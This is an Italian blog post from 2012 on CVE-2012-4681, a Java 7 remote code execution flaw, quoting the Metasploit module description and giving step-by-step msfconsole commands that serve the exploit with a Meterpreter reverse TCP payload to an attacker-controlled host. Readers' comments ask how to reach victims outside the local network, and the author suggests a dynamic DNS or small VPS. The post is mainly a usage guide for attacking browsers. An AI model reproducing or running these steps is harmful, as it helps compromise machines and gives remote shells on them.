ClsHack Blog


[CVE-2012-4681] Java 7 Remote Code Execution && Metasploit

September 2nd, 2012 by clshack


E’ da tanto che non parlo di qualche nuovo exploit disponibile sul nostro amico metasploit.

Ma è da poco uscita una nuova vulnerabilità per java che consente l’esecuzione di codice remoto senza autorizzazione.

La descrizione dell’exploit è la seguente:

This module exploits a vulnerability in Java 7, which allows an attacker to run
arbitrary Java code outside the sandbox. The vulnerability seems to be related to
the use of the newly introduced ClassFinder#resolveClass in Java 7, which allows
the sun.awt.SunToolkit class to be loaded and modified. Please note this flaw is
also being exploited in the wild, and there is no patch from Oracle at this point.
Our module has been successfully tested on multiple setups, including: IE, Firefox,
Chrome and Safari on Windows, Linux and OS X, etc.

Come avrete ben letto, nessun browser è al sicuro se la versione in uso di java è vulnerabile.
Nemmeno i diversi sistemi operativi potranno proteggervi.

Questo modulo non funziona con l’update u7 rilasciato da java per proteggere i vostri pc, ma rimane comunque vulnerabile ad una nuova variante del virus.
http://pastebin.com/zQZzMswr

Ecco come utilizzare l’exploit su metasploit:

sudo msfupdate

sudo msfconsole

use exploit/multi/browser/java_jre17_exec
set SRVHOST 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
exploit

Demo video:

CVE-2012-4681 Java 7 Applet RCE 0day Gondvv Linux Metasploit Demo

CVE-2012-4681 Java 7 Applet RCE 0day Gondvv Windows Metasploit Demo

  • bckd00r

    Per utilizzarlo fuori dalla lan/wan come al solito no-ip?

    • ClsHackBlog

      yes oppure una piccola vps :) fanaticavps :D

  • Pingback: CVE-2012-4969: Internet Explorer

  • echo

    Ciao! sto testando per prova questo exploit da pc win7 che si collega a backtrack5;
    non sono riuscito a capire pero’ se la mia versione attuale di java risulta essere vulnerabile: build 1.7.0_07-b11, non riesco a trovare il tuo riferimento “patch u7″ , difatti l’exploit si ferma in “Sending Applet”
    Grazie mille!!

    • ClsHackBlog

      vuol dire che hai l’update 07 e quindi l’exploit non può funzionare sul tuo pc ;)